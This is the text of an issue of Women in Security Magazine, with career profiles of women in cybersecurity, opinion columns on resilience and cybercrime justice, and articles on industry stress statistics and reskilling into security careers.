For over 4 years, Source2Create has proudly delivered Women in Security Magazine, a global industry resource, to the market—for free. Bi-monthly, this magazine has provided over 100 pages of valuable content, from industry insights to career advice, personal stories, and student spotlights, fostering diversity and excellence in the security industry. Until now, the costs to create each issue have been entirely covered by Source2Create. But now, we’re asking for your help to keep the lights on. Your support will ensure we can continue producing this essential resource and delivering it to our global community of security professionals.

Together, we can ensure the stories, insights, and guidance that matter most continue to reach those who need them. Your support means the world to us—and to the thousands of readers who rely on Women in Security Magazine.

Esther Roberts

Cybersecurity Analyst and Penetration Tester at Port Harcourt

Esther Roberts’ journey into cybersecurity began with a fateful phone call in 2022, just after completing her youth service.

“Someone called offering me a job, asking me to call another number, and eventually requested a payment to secure my spot,” she recounts. Skeptical yet curious, she turned to Google, uncovering the mechanics of social engineering—a revelation that ignited a spark. “I didn’t even know the term ‘phishing’ back then,” she admits, “but that incident opened my eyes.”

Her discovery led her to take Cisco’s Introduction to Cybersecurity course, marking her first step into the field. A serendipitous encounter on Twitter introduced her to the CyberGirls program by the CyberSafe Foundation, where she successfully majored in Vulnerability Assessment and Penetration Testing. This program transformed her budding interest into a fully-fledged passion.

“I always knew I wanted something in ethical hacking,” Esther reflects. The structured tracks in the CyberGirls program reinforced her goal of protecting digital spaces from threat actors. Over time, her interests expanded to include digital forensics, illustrating her appreciation of the interconnected nature of cybersecurity roles.

While she embraced her path with determination, Esther wasn’t immune to moments of self-doubt. “I never doubted my choice of career, but I questioned my abilities,” she shares candidly. In those moments, she found strength in the CyberGirls mantra: “I am knowledgeable, resilient, and excellent… I am a CyberGirl.”

This mantra served as a lifeline, reminding her of her potential and fueling her drive to overcome challenges.

Esther’s journey has been shaped by inspiring figures in the cybersecurity world. Confidence Staveley, a global mentor, instills in her the belief that greater heights are achievable. Her CyberGirls mentor, Chineye C. Chizea, continuously supports her with resources and encouragement. Esther also credits digital influencers like the Digital Empress, whose content on cybersecurity and business resonates with her aspirations. “Their stories remind me that I can do it—and that I should do it,” she says with conviction.

Reflecting on her path, Esther offers words of wisdom to her younger self:

“It’s okay to be unsure at first. Explore, stay consistent, and let passion guide you. Take advantage of free resources and remember—learning never ends.”

For those transitioning into cybersecurity, she advises leveraging skills from previous careers. “Draw parallels between your background and cybersecurity. You’ll see how interconnected things are, which helps in understanding concepts.”

Looking to the future, Esther predicts significant developments in AI and machine learning for anomaly detection. Yet, she also warns of AI-powered cyberattacks, emphasizing the need for organizations to adopt AI-driven security solutions. “It’s going to be the good AI versus the evil AI,” she quips.

Today, as a Cybersecurity Analyst and Penetration Tester at Port Harcourt, Esther embodies the drive to protect, learn, and grow. Her journey underscores a simple truth: curiosity, persistence, and a supportive community can transform any spark of interest into a blazing passion.

“I am a voracious learner, so nothing is too difficult for me to master.”

Esther Roberts is living proof of this mantra, and she’s only just begun.

www.linkedin.com/in/estherrobertsthankgod

x.com/i_estherroberts?s=21

Lihansa Minradie Jayasinghe

Associate Engineer - Information Security at CryptoGen

Lihansa Minradie Jayasinghe’s journey into cybersecurity is anything but conventional. Initially drawn to biological sciences, she had little interest in IT. “My main passion was in life sciences,” she says, reflecting on her early academic pursuits. But as technology began to shape the world around her, curiosity sparked a shift in focus. “I wanted to understand how everything was connected and how people could assure their data was secure over the internet,” she explains. What began as a casual exploration turned into a deeper fascination, leading her to pivot her studies toward computer science and cybersecurity.

Her decision to specialise in defensive security wasn’t immediate; it grew through her immersion in the field. “The more I learned, the more I realized my true passion was in protecting systems and tracking down those trying to break them,” she says. However, transitioning from life sciences to a highly technical domain came with its share of challenges.

Lihansa openly acknowledges moments of doubt. “I was surrounded by peers who were much more tech-savvy than I was. It was daunting, and I sometimes wondered if I had made the right choice.” But her drive to succeed, combined with a passion for the field, kept her going. “I dedicated extra time to learning and eventually found my rhythm. Looking back now, I’m certain I made the right decision.”

If she could give advice to her younger self, Lihansa would encourage an earlier embrace of the learning process. “Cybersecurity is constantly evolving, and staying curious is essential. I’d tell myself to start with the basics (networks, programming, security concepts) and not be afraid to step out of my comfort zone.” She also highlights the value of patience. “It’s a field where you won’t know everything at the start, and that’s okay. Growth comes with time and persistence.”

For aspiring cybersecurity professionals, Lihansa emphasises building a strong foundation in networking, programming, and risk management. These, she believes, are key to understanding both how systems are compromised and how to defend them.


Balancing the demands of her role is another aspect of her journey. In the fast-paced world of defensive security, maintaining focus and avoiding burnout is crucial. “There isn’t always a 9-to-5 schedule in this field,” she says. Creative writing, especially poetry, is her way of unwinding. “It clears my mind and helps me express myself. Spending time with loved ones and staying active are also important for keeping that balance.”

To stay current, Lihansa pursues certifications, keeps up with threat intelligence, and remains hands-on with the tools and systems used in her work. “Continuous learning is non-negotiable in this field,” she says, emphasising the importance of both technical expertise and community engagement.

For those transitioning into cybersecurity from other fields, Lihansa’s simple but powerful advice is: “Be patient and embrace the learning curve. Don’t be discouraged by what you don’t know, but build on your strengths and take it step by step. Hands-on practice and networking are invaluable.”

Her story is a testament to the power of adaptability and determination. From life sciences to cybersecurity, Lihansa’s journey reflects the importance of following one’s curiosity, embracing challenges, and finding fulfillment in the pursuit of a passion. “Every experience teaches you something valuable,” she says. “Cybersecurity is a journey, and it’s one that’s well worth the effort.”

www.linkedin.com/in/lihansaj

Stacia Mason

GRC Analyst at Acrisure

For Stacia Mason, a Risk Analyst based in Grand Rapids, Michigan, the seeds of her cybersecurity career were planted early.

“It all started with my dad,” she recalls, “who had a passion for technology and used to build computers from the ground up as a hobby. Growing up, he’d always say, ‘Computers are the future.’” Those words stuck with her, and as she witnessed the rise of social media and the vulnerabilities it exposed, Stacia found herself drawn to the challenge of safeguarding digital spaces.

“What began as a personal interest grew into a fascination with the strategic side of cybersecurity,” she says. “Identifying risks before they become issues and protecting organizations in an ever-evolving digital world—it’s a puzzle I never get tired of solving.”

Yet, Stacia’s path to cybersecurity was anything but traditional. Without a tech background, she took a leap of faith and enrolled in an intensive eight-month cybersecurity program through the West Michigan Center for Arts and Technology (WMCAT) in partnership with GRCIE. “Stepping into cybersecurity was intimidating. I wasn’t sure how I’d fit in,” she admits. “But I kept reminding myself, ‘If I don’t take this chance, I’ll never know what’s possible.’”

The program proved transformative. It offered hands-on experience, bolstered her confidence, and showed her how transferable skills like problem-solving and communication could flourish in the cybersecurity world. From there, Stacia seized every opportunity to grow, whether through networking, certifications, or mentorships. “Piece by piece, things started to click,” she reflects. “Looking back, it was all about trusting myself and stepping out of my comfort zone.”

Now, as a Risk Analyst, Stacia navigates the complexities of a field that’s anything but static. “Cybersecurity is constantly evolving, and some days, it feels like there are a million moving pieces. It can get overwhelming,” she shares. Her approach? Breaking challenges into manageable steps, relying on her team for collaborative problem-solving, and celebrating the victories that come with securing systems and data.

Despite her accomplishments, Stacia acknowledges moments of doubt, particularly early on. “Coming from a non-technical background, I often questioned whether I belonged in this field,” she recalls. Mentors and peers played a pivotal role in silencing those doubts, reminding her of the value she brought to the table. Over time, she embraced the idea that “growth happens outside your comfort zone.”

Stacia’s career continues to unfold organically, with GRC being her current focus. “Right now, it’s the perfect fit,” she says. “But as I learn more, I can see myself stepping into a technical role like security engineering.” For her, the journey is less about rigid plans and more about staying curious and open to new challenges.

Her advice to those considering cybersecurity? “Trust your intuition and don’t shy away from challenges. Surround yourself with a community that aligns with your vision and never stop learning.” She also emphasizes the importance of networking, mentorship, and finding joy in the learning process.

As she looks ahead, Stacia is optimistic about the transformative role AI and machine learning will play in cybersecurity, as well as the growing challenges they pose. “AI-powered phishing and social engineering tactics are evolving quickly. Raising awareness and improving detection tools will be crucial,” she notes.

For Stacia, success is measured not just in technical achievements but in the balance she maintains in her life. “I’ve learned that taking care of myself isn’t just good for me—it makes me better at my job. When I feel grounded, I can bring my best self to work and home.”

Her journey, marked by bold choices, continuous learning, and a passion for collaboration, is a testament to the potential of embracing uncertainty. “Cybersecurity,” she reflects, “isn’t just a field—it’s a way of thinking, solving problems, and making an impact. And I wouldn’t trade this journey for anything.”


www.linkedin.com/in/staciajmason

CRAIG FORD

Head Unicorn – Cofounder and Executive Director, Cyber Unicorns. Australian Best Selling Author of A Hacker I Am, Foresight and The Shadow World book series. vCISO – Hungry Jacks, Wesley Mission, PCYC, Baidam Solutions and Ipswich City Council. Member of the Board of Directors – AISA (Australian Information Security Association).

COLUMN

Climbing out of the ashes of failure

Resurgence: The Phoenix’s Triumphant Ascent is the theme for the 23rd edition of this amazing magazine. When I say these words the image they conjure up is one of the mythical origins of a majestic phoenix launching into the sky from a mountain of ashes with flames trailing from its feathers. It is a magnificent sight: one of rebirth, of achievement and inspiration.

In my last article, in edition 22, I talked about some of my own failures and how I was able to take those situations and make something amazing from them. We all fail sometimes. It’s part of being human. It’s part of life. When I was growing up my father used to say to me: “It doesn’t matter that we fall sometimes, it’s about how we brush ourselves off, get back up and try again.”

These words reflect how I live my life.

Those who know me well will know I am not one to shy away from a challenge, quite the opposite, and to my own detriment sometimes. I see a problem. I break it down, and I want to fix it. My passion drives me to achieve things beyond my self-belief. I don’t always know if I can achieve what I set out to do. Sometimes I fail, but I pick myself up and look for another way forward.

Sometimes growth hurts, and sometimes I want to give up and take the easy way, the well-worn path in life that many would happily follow. That is not me. That is not what gets me out of bed every morning.

As a founder of a startup, I took a leap of faith in myself. I believed the battle I wanted to wage to improve cyber education across vulnerable groups in this country, and in the world, was worth fighting. I put myself and my family’s financial security at risk because I knew I could make a difference.

I had been talking about it for years. I can almost hear myself saying it in many interviews and podcasts over the years. “Someone really needs to create a slip-slop-slap campaign for the general public. Someone needs to step out and provide everyday people with access to cyber awareness education: mums and dads, seniors, SMBs and everyone in between.”

I can remember saying this as far back as 2018, the year I wrote my first article for CSO Online, the year I found my love for writing (The amazing Aby from WISM was the editor of CSO at that time, and I love that we are still on this writing journey together). It was a newfound hobby I never knew I wanted, or even considered, but writing is a skill that has brought me through the ashes on a few occasions, and given me the focus and drive to keep fighting for what I believe in.


What am I trying to say here? It’s simple, and something I want to instil in you if I can. I want you to believe in yourself, believe in what you know you are born to do in this world and take the chances you know are worth the risk. Sometimes you might fail, but failure is good.

Thomas Alva Edison—who invented the light bulb—said: “I didn’t fail 1,000 times. The light bulb was an invention with 1,000 steps.” Take this idea and reframe how you see your goals and your career. Look at failures or hiccups in your journey as steps towards achieving the goals you have set for yourself. Allow yourself to imagine the possibilities. Launch yourself like the phoenix from the ashes and become a magnificent shining light for others to see, and say: “Maybe I can reach a little higher. Maybe that could be me.”

Be that phoenix. Be the beacon of hope that shows we can aspire to do great things, that we are capable and worthy of success.

www.linkedin.com/in/craig-ford-cybersecurity

www.facebook.com/profile.php?id=61552330571786

www.instagram.com/cyberunicorns.com.au

x.com/CraigFord_Cyber

www.cyberunicorns.com.au

INDUSTRY PERSPECTIVES

MARCUS LAVALLE-SMITH

CYBERSECURITY AND HARRY POTTER - PART 2: RISING ABOVE THE THREATS

As we look to the future of cybersecurity there are significant warnings to be heeded from the magical world of Harry Potter and the resilience displayed by Fawkes the phoenix. In the face of growing threats, cybersecurity professionals, like our beloved heroes from Hogwarts, must rise stronger from each challenge. Let us explore how the mythical creatures, spells and lessons from the wizarding world can help us forge a path through the turbulent landscape of modern cyber threats.

THE TRIWIZARD TOURNAMENT: PREPARING FOR CYBER BATTLE

In Harry Potter and the Goblet of Fire, the Triwizard Tournament serves as a test of strength, bravery and wit. Similarly, cybersecurity professionals face ongoing challenges that test their skills against ever-evolving threats. The tournament is dangerous, with each task pushing the contestants to their limits, much like how cybersecurity teams must always be on alert for sophisticated attacks.

Take the second task, where competitors need to face the dangers lurking beneath Hogwarts’ Lake, or the third where they have to navigate through a dangerous maze. These mirror the ways cybersecurity teams must deal with multifaceted threats like ransomware attacks, distributed denial of service (DDoS) attacks and complex vulnerabilities hidden within networks. Just as Harry and his friends were forced to adapt, cyber professionals must constantly update their knowledge and employ the latest strategies to stay ahead of the attackers. The use of proper tools like firewalls, intrusion detection systems and threat intelligence helps safeguard against threats, just as magical protections helped Harry in the tournament.

THE MARAUDER’S MAP: REAL-TIME THREAT VISIBILITY

The Marauder’s Map in the Harry Potter books is a magical map that shows the complete layout of Hogwarts, including secret locations and hidden paths. This is exactly what modern-day cybersecurity experts need: a clear, real-time map of their systems, users and network traffic. Just as the Marauder’s Map shows every route and location within the castle, cybersecurity tools like security information and event management (SIEM) systems offer a comprehensive view of what is happening on a network at any given time. With proper visibility, security teams can detect anomalies and quickly respond to potential breaches.

THE DARK MARK: THE SILENT THREAT

Voldemort’s Dark Mark, a symbol of fear and power, is akin to the silent, invisible nature of modern cyber threats. These threats can appear with little warning, often leaving organisations unaware until it is too late. Just as the Dark Mark strikes fear into the hearts of those who see it, cyber threats like data breaches, advanced persistent threats (APTs) and zero-day vulnerabilities can cause long-term damage to an organisation’s reputation, finances and operations.

DUMBLEDORE’S ARMY: THE POWER OF COLLABORATION

In the Harry Potter series one of the most powerful tools in the fight against evil is collaboration. Dumbledore’s Army (DA) was a group of students who banded together to learn Defence Against the Dark Arts and face the challenges posed by the forces of evil. In cybersecurity, collaboration is just as crucial. Cybersecurity experts must work together across teams, sharing knowledge, tools and strategies to defend against the growing number of cyber threats.

Just as the members of DA combined their knowledge and skills to confront dark forces, companies must rely on teamwork and information sharing to combat cyber threats. Threat intelligence sharing platforms, collaborative forums and joint cyber defence initiatives are essential to

BREAKING THE BARRIERS: WOMEN IN CYBERSECURITY AND THE PATH TO A RESILIENT DIGITAL FUTURE

As we close 2024 and reflect on the year that was, it’s safe to say the cybersecurity industry is at a crossroads. We continue to grapple with increasing threats that are intricate and complex, we are experiencing rising stress levels and the skills gap remains persistent.

According to the 2024 State of Cybersecurity report by ISACA, 64 percent of cybersecurity professionals in Australia report higher stress in their roles compared to five years ago, highlighting an urgent need for change. For women in security, this is both a challenge and an opportunity. The statistics and sentiments in the ISACA report not only reflect the pressure faced by cybersecurity professionals, they also highlight how women can play a critical role in strengthening the industry.

THE GROWING CHALLENGE: STRESS AND SKILLS GAPS

ISACA’s report indicates that Australian cybersecurity professionals are experiencing stress at higher rates than their global peers, driven by:

• An increasingly complex threat landscape (85 percent locally versus 81 percent globally)

• Budget constraints (48 percent versus 45 percent globally)

• Worsening hiring and retention challenges (50 percent versus 45 percent globally)

• Limited prioritisation of cybersecurity risks (35 percent versus 34 percent globally)

These barriers are compounded by workforce shortages. With 51 percent of organisations reporting understaffed cybersecurity teams and only 34 percent expecting budgets to increase in the next year, the industry is struggling to keep pace with threats. Women, who remain underrepresented in cybersecurity, face unique challenges in this male-dominated field, but their involvement is essential to address the growing demands of the profession.

THE OPPORTUNITY: WOMEN AS CHANGE AGENTS IN CYBERSECURITY

Women bring diverse perspectives, leadership styles and critical interpersonal skills—such as communication, critical thinking and problem-solving—that the ISACA report identifies as key gaps in the industry. Organisations must recognise the untapped potential of women to enhance collaboration and innovation in cybersecurity teams.

Staying ahead of new technologies is all-consuming and a diversity of perspectives is crucial in this battle.

Many of the barriers women face—such as limited mentorship opportunities, lack of career visibility and work-life balance concerns—are not insurmountable. Programs that offer mentorship, leadership training and flexible work environments can assist women to thrive in cybersecurity roles.

ADDRESSING BARRIERS: BRIDGING THE SKILLS GAP

Interpersonal skills—identified as a critical gap by 47 percent of survey respondents—are skills in which women often excel. Communication and leadership skills are vital for driving team cohesion and effective response strategies. Empowering women through technical training and certifications, combined with leveraging their natural aptitude for collaboration, can position women as indispensable assets in the fight against cyber threats.

COMBATING BURNOUT: PRIORITISING WELLBEING

The ISACA report highlights the toll that stress takes on cybersecurity professionals, with high work stress cited as a key reason for attrition (60 percent in Australia compared to 46 percent globally). For women, this stress is often compounded by the challenges of balancing professional and personal responsibilities in a high-pressure industry. Addressing burnout must become a priority for organisations seeking to retain top talent.

Employers need to explore initiatives such as flexible work schedules, building inclusive workplace cultures, mental health support and clear pathways for career progression.

BUILDING A CULTURE OF INCLUSION

For women to succeed in cybersecurity they must feel welcomed and supported in an industry sector that has traditionally been dominated by men. This means breaking down barriers like unconscious bias, ensuring fair recruitment practices and creating mentorship opportunities. Women-specific cybersecurity organisations and initiatives, such as ISACA’s SheLeadsTech program, play a crucial role in building supportive networks and inspiring the next generation of female cybersecurity professionals.

The ISACA report also highlights the importance of addressing recruitment and retention challenges across the board. With 63 percent of Australian organisations struggling to retain talent, the industry must prioritise an inclusive culture that encourages women to stay and grow within their roles.

A CALL TO ACTION FOR WOMEN AND ORGANISATIONS

The challenges outlined in ISACA’s report confirm the urgent need for fresh talent, perspectives and strategies. For women considering a career in cybersecurity the path may not always be easy, but there is no denying that women can be impactful. By stepping into this field women can become agents of change, helping to close the skills gap, strengthening defences and building a more secure digital future.

For organisations, my message is to foster diversity not just as a matter of equity, but as a strategic imperative. Empowering women through mentorship, education and supportive work environments is not only the right thing to do, but is essential for combating threat actors and creating resilient businesses.

WOMEN LEADING THE WAY FORWARD

In 2025 I will continue championing efforts to help cybersecurity professionals redefine what a healthy cybersecurity workforce looks like, and what it means to truly participate and lead in this field. With the right support systems in place and a strong commitment to inclusion, women will bring invaluable skills, perspectives and resilience that this sector needs more than ever.

I’m proud of the strides we’ve made in advancing diversity and inclusion, although I would like to see a greater rate of change, and I urge organisations to continue these efforts as a key driver of innovation and strength.

Women in cybersecurity are not merely filling a gap, we are integral to reshaping the future.

ABOUT THE AUTHOR

Jo Stewart-Rattray has over 25 years’ experience in the security industry. She consults on risk and technology issues with a particular emphasis on governance and IT security in businesses as a director with BRM Advisory. She regularly provides strategic advice and consulting to the banking and finance, utilities, healthcare, manufacturing, tertiary education, retail and government sectors.

www.linkedin.com/in/jo-stewart-rattray-4991a12

LISA VENTURA

THE PHOENIX EFFECT: WOMEN RESKILLING AND PIVOTING INTO CYBERSECURITY

In the world of Greek mythology the Phoenix is a magnificent bird that rises reborn from the ashes of its funeral pyre. It symbolises rebirth, renewal and transformation. It stands as a metaphor for reinventing oneself after adversity; something that resonates deeply with many women who find themselves at the crossroads of career transitions, particularly those venturing into the rapidly expanding field of cybersecurity.

The ‘Phoenix Effect’ describes the journey of women leaving behind careers in industries such as education, marketing or healthcare and embracing new roles in cybersecurity, where they must reskill, learn and thrive in a dynamic and challenging environment. The rise of women in cybersecurity signifies more than just a career pivot; it also signifies empowerment, resilience and the importance of diversity in a crucial industry.

THE GROWING NEED FOR CYBERSECURITY PROFESSIONALS

Cybersecurity has emerged as one of the most critical fields of the 21st century, with cyber threats increasing in both frequency and sophistication. As the digital landscape expands so too does the need for professionals who can protect sensitive data, defend against cyberattacks and ensure the security of complex networks. According to the 2024 (ISC)² Cybersecurity Workforce Study, the global cybersecurity workforce needs to grow by nearly 3.4 million professionals to meet the demands of organisations worldwide. This need creates a tremendous opportunity, particularly for those looking to pivot onto a new career path.

Women, historically underrepresented in cybersecurity and STEM fields, are beginning to recognise the potential for growth and fulfilment offered by a career in cybersecurity. The Phoenix Effect is playing out in real time as many women transition from their previous professions into this evolving sector. But what drives this shift, and how can women successfully navigate this career transition?

THE PHOENIX EFFECT: REINVENTING CAREERS IN CYBERSECURITY

Just as the phoenix symbolises transformation, so too does the journey of women who re-skill and pivot into cybersecurity. Leaving behind a previous career, especially one into which significant time and effort have been invested, can be daunting. However, many women are finding that a cybersecurity career not only offers professional and financial growth but also provides a sense of purpose: they are working towards something that truly matters in today’s digital age.

The Phoenix Effect means women transitioning into cybersecurity must often overcome initial fears and doubts about their technical skills and knowledge. While cybersecurity can seem like an intimidating field dominated by highly technical jargon and complex systems, many women are discovering that the skills they developed in their previous careers are not only transferable but valuable in this new context. Roles in cybersecurity require not only technical proficiency but also problem-solving abilities, communication skills and leadership—attributes women from various industries already possess.

For example, a former educator entering cybersecurity brings strong analytical skills, the ability to communicate complex ideas clearly and experience in mentoring and guiding others. A marketing professional can leverage their understanding of human behaviour and risk management, while healthcare workers transitioning into cybersecurity are already adept at following strict regulations and handling sensitive information. The key is to identify and build upon these transferable skills, and then re-skill to gain the technical knowledge needed to succeed.

THE IMPORTANCE OF LIFELONG LEARNING IN CYBERSECURITY

One of the hallmarks of a successful career in cybersecurity is the commitment to lifelong learning. Technology is ever evolving, and so too are the tactics used by cybercriminals. Women transitioning into cybersecurity must embrace a mindset of continuous education and professional development. This might seem daunting at first, but for many it represents an exciting opportunity to stay at the cutting edge of innovation and technology.

The cybersecurity industry offers a wealth of educational pathways and certification programs designed to help individuals upskill and pivot into the field. Women interested in transitioning to cybersecurity can explore various online courses, boot camps and certification programs that provide both foundational knowledge and specialised expertise. Many of these programs are flexible, allowing women to study part-time while balancing existing responsibilities or continuing to work in their current profession.

Some of the most recognised certifications in cybersecurity include:

• CompTIA Security+: a great entry-level certification that covers the fundamentals of network security, threats and vulnerabilities.

• Certified Information Systems Security Professional (CISSP): one of the most respected certifications for experienced cybersecurity professionals, emphasising security architecture, management and control.

• Certified Ethical Hacker (CEH): focuses on penetration testing and ethical hacking, helping professionals learn how to identify and exploit vulnerabilities in systems.

Additionally, platforms like Coursera, edX, and LinkedIn Learning offer introductory courses in cybersecurity which are often free to access, making it easier than ever for women to gain technical knowledge at their own pace.

PROGRAMS SUPPORTING WOMEN’S CAREER CHANGES

Several organisations, recognising the gender gap in cybersecurity, have created initiatives specifically aimed at supporting women’s career pivots into the industry. These programs offer mentorship, networking opportunities, scholarships and career resources to help women successfully navigate their transition.

• Women in Cyber Security (WiCyS). This nonprofit organisation is dedicated to increasing the number of women in cybersecurity by offering career development opportunities including an annual conference, mentoring programs and job boards.

• CyberSafe Foundation. Through its Women in Cyber Security initiative, this organisation provides training, mentorship and scholarships to help women upskill and find careers in cybersecurity.

• Girls Who Code. While this program focuses primarily on younger girls it also offers resources and support for women looking to re-skill and transition into tech fields like cybersecurity.

Additionally, many companies have begun offering retraining programs for women returning to the workforce after a career break, such as Accenture’s Returning Mums program and IBM’s Tech Re-Entry program, which provide cybersecurity training and job placement support.

TRANSFERABLE SKILLS AND THE POWER OF DIVERSITY

One of the major strengths women bring to cybersecurity is their array of transferable skills gained in previous careers. These skills, often categorised as ‘soft’ skills, are essential in cybersecurity. Problem-solving, critical thinking, effective communication and project management are all critical to success in cybersecurity roles, and many women possess these attributes from their previous professions.

For example, cybersecurity is not just about writing code or configuring firewalls. It also involves understanding how to manage risks, assess vulnerabilities and anticipate the behaviour of malicious actors. Women from backgrounds such as law, finance and even the arts often excel in cybersecurity because they bring new perspectives to complex problems. This diversity of thought is essential in an industry where creative solutions are often the key to defending against novel threats.

Also, diversity in cybersecurity is not just a feel-good goal; it has a direct impact on problem-solving and innovation. A team made up of individuals with diverse backgrounds, experiences and ways of thinking is better equipped to identify weaknesses in systems and design more comprehensive security measures. Studies have shown that diverse teams are more creative and perform better when solving complex problems. Women’s contributions are essential to this effort, bringing fresh perspectives that challenge conventional approaches.

PRACTICAL ADVICE FOR WOMEN CONSIDERING A PIVOT TO CYBERSECURITY

A career pivot to cybersecurity can be both an exciting and overwhelming prospect for any woman contemplating such a move. Here are some practical steps to help ease the transition.

1. Assess your transferable skills. Begin by identifying the skills you already have that are relevant to cybersecurity. Problem-solving, risk management, communication and analytical thinking are just a few examples. Use these as a foundation for your transition.

2. Research educational pathways. Explore certification programs and online courses that fit your current skill level and career goals. Entry-level certifications such as CompTIA Security+ are a good starting point for those new to cybersecurity.

3. Seek out mentorship and support networks. Join organisations like Women in Cyber Security (WiCyS) or attend cybersecurity conferences and meetups. Building a network of support can provide valuable advice, job leads and encouragement.

4. Gain hands-on experience. Look for opportunities to apply your knowledge through internships, volunteer work or participation in cybersecurity competitions like Capture the Flag (CTF) events. Practical experience is essential for building confidence and demonstrating your skills to potential employers.

5. Embrace lifelong learning. Cybersecurity is a field that requires continuous education and adaptation. Stay updated on the latest threats, tools and technologies by following industry news, taking additional courses and earning advanced certifications as your career progresses.

6. Believe in your ability to pivot. Transitioning to cybersecurity might seem like a big leap, but it is entirely possible with determination and the right mindset. The journey may be challenging, but like the phoenix, you have the potential to rise and succeed in a new and fulfilling career.

SIMON CARABETTA

A former public high school teacher, Simon has maintained his passion for education and brought it into his new career as he advocates for better cyber security awareness and cultural change. There is nothing special about the way he goes about doing what he does; he just draws on his raw passion for inspiring change and wanting people to realise why and how they should protect themselves and their families online.

COLUMN

Whiskey for my men and women, beer for my horses

Disclaimer: The writer, in no way, shape, or form, condones serving beer to any animal, especially horses.

WE’LL RAISE UP OUR GLASSES AGAINST EVIL FORCES...

I’m sure that most of this publication’s readers would know who Willie Nelson is. He’s the 91-year-old outlaw country music legend who has been around for many decades, bringing us classics such as On the Road Again, Mammas Don’t Let Your Babies Grow Up to Be Cowboys, and Whiskey River. But how many of you have heard of the late, great Toby Keith?

Probably not many, but you’ve won my respect if you have.

Why do I ask? Well, in 2003 both these country music singers teamed up to bring us the hit single, Beer for My Horses (hey, that’s the name of this article!). The song, with a very catchy tune, is about the need and desire for justice against those who’ve done us wrong. The lyrics tell of vengeance and defending others, rounding up those who’d be willing to commit crimes and, of course, bringing justice for all. It’s the kind of song that stirs up feelings about our security industry. We spend a lot of time developing and learning new ways to defend against the bad folks, but there is little discussion about how to take them down.

Back in the days when I worked for the national AustCyber Node Network our office was one level below the cybercrime unit of the WA Police Force. I had the chance to visit their office on several occasions, meet some of the people, and learn how they would take down criminals in the digital world. It was exciting stuff, but when I look back on all I accomplished during my time at AustCyber, there was very little I achieved in relation to countering cybercrime. My work was all about cybersecurity and supporting the many amazing private sector startups coming out of Perth at the time.

We’ll raise up our glasses against evil forces is part of the chorus of Beer for My Horses. In full it is: We’ll raise up our glasses against evil forces singing/Whiskey for my men, beer for my horses. Wouldn’t it be ideal to live in a world where we could celebrate our state and federal law enforcement agencies taking down some serious ransomware gangs, or helping to facilitate the overseas arrest of someone who had launched a distributed denial of service (DDoS) attack against a vital government website? I know this does happen from time to time, but I also believe there should be far more focus on the crime and punishment aspect when we discuss cyber.

‘Cause justice is the one thing you should always find is another line from Beer for My Horses. Very apt lyrics when we think about the $2.7b lost by Australians to scams in 2024, or the 54 separate DDoS incidents we know of that the ASD responded to last financial year. Where is the justice?

Yes, we can set up and follow frameworks that will help protect us. We can train and raise awareness. We can facilitate executive tabletop exercises and test our incident response plans, all while procuring the latest ‘silver bullet’ in cyber defence. But until we see more takedowns and cooperation between international agencies, we will likely be on the back foot for years to come. With advances in AI and quantum computing just around the corner, the bad folks are avoiding the justice we so desperately need. Not want, but need.

I’ll leave each of you lovely readers with a final question on this subject. Is the best defence an excellent offence? Or is it the other way around? We surely have the tools and capability to begin designing solutions that can increase our ability to bring the justice we’ve been searching for. And we’ll raise up our glasses against evil forces, singing whiskey for my men (and women) and beer for my horses.

www.linkedin.com/in/simoncarabetta


CAREER PERSPECTIVES

MARY

TRANSFORMING SETBACKS INTO AN UNSTOPPABLE RISE TO THE TOP

Growing up I was hooked on computers. I couldn’t wait to play games on my mum’s laptop. Her career as a networking engineer and IT officer introduced me to tech at an early age. By age six I was enrolled in computer classes and loving every moment; typing games and fun activities. I was the star of the class.

As I got older my passion for tech grew. In high school I took advanced computer classes and became the head of the IT club. It was exciting doing what I loved and developing leadership skills.

In my final year of high school I had to decide what to study at university. I wanted to explore programming, so I enrolled in a short course in web and mobile app development. At the time it was the toughest challenge I had faced, but my determination kept me going.

A few months later I entered university to pursue a degree in business and information technology. From day one I was set on specialising in cybersecurity. I even created a roadmap to becoming a chief information security officer (CISO), which I shared with friends. We laughed at how ambitious it seemed, but I knew it was the right path.

Then, in December 2020, I graduated during a tough time. The job market was a mess. People were being laid off and, no matter how many jobs I applied for, I received rejections. To make matters worse my mum got COVID-19 and this hit us hard emotionally and financially. Between taking care of her and figuring out my career I was stressed, but I pushed forward.

After months of uncertainty I landed my first job as a software engineer. It wasn’t in cybersecurity, but it was a start. I spent two years in the role, learning about systems and gaining real-world experience. Then, later in 2021, something incredible happened. I was nominated for the WomenTech Global Awards in two categories: Rising Star in STEM of the Year and WomenTech Ambassador. Those nominations boosted my confidence and showed me I was on the right track.

After some soul searching I resigned from my software engineering job to focus on cybersecurity. I applied for the Cybergirls 2.0 Fellowship run by the Cybersafe Foundation, and was selected. At the same time I landed a one-year internship in the ICT department of a government agency. It was a huge leap, but I knew it was the right choice. Balancing the internship with my training wasn’t easy. Sometimes I would be sent to remote areas for fieldwork where it was challenging finding a stable internet connection to attend virtual training. But I was determined to make it work.

The Cybergirls training gave me hands-on skills applicable to my internship role. I felt I was building my toolkit to tackle real-world security challenges. The confidence I gained from that training helped me start freelancing as a cybersecurity consultant after my internship ended.

While freelancing I launched a LinkedIn newsletter, The Cyber-Cop Hub, inspired by my father, who jokingly referred to me as a ‘cyber cop’ when we discussed my goals. Writing the newsletter helped me share my learning, connect with cybersecurity professionals and strengthen my personal brand.

This was a period of learning and growth. I stayed positive, prayed and focused on building my brand. Cybersecurity is highly competitive. Standing out is crucial. Through resilience and hard work I eventually landed my first full-time role as a cybersecurity engineer in enterprise security.

I knew I needed mentors to continue growing, so I joined several programs, including Women in Security affiliate WiCySEastAfrica run by Strathmore University and Standard Chartered, and the Women in Cybersecurity program run by the International Telecommunication Union (ITU). These programs provided access to incredible mentors who expanded my perspective and encouraged me to explore my strengths.

One mentor, Restercuter Nyawira, pushed me to work on my public speaking skills. She encouraged me to speak at technical sessions with local cybersecurity community SheHacks KE, and at industry events. These experiences boosted my confidence and led to opportunities to speak with cybersecurity students at universities across Kenya. I also became a cybersecurity instructor for a Rapid Tech Skills program, a flagship project under The Strengthening of Kenya’s Innovation and Entrepreneurship Ecosystem (SKIES), part of the Kenya Industry and Entrepreneurship Programme (KIE). The program is helping to shape the next generation of cybersecurity professionals, and my role was highly fulfilling.

Recently, I had the honour of speaking at Black Hat Middle East and Africa 2024, the region’s biggest cybersecurity conference. Held in Riyadh, Saudi Arabia, it brought together brilliant minds in the field. Sharing insights with such a diverse audience was a huge milestone and strengthened my commitment to advancing cybersecurity globally.

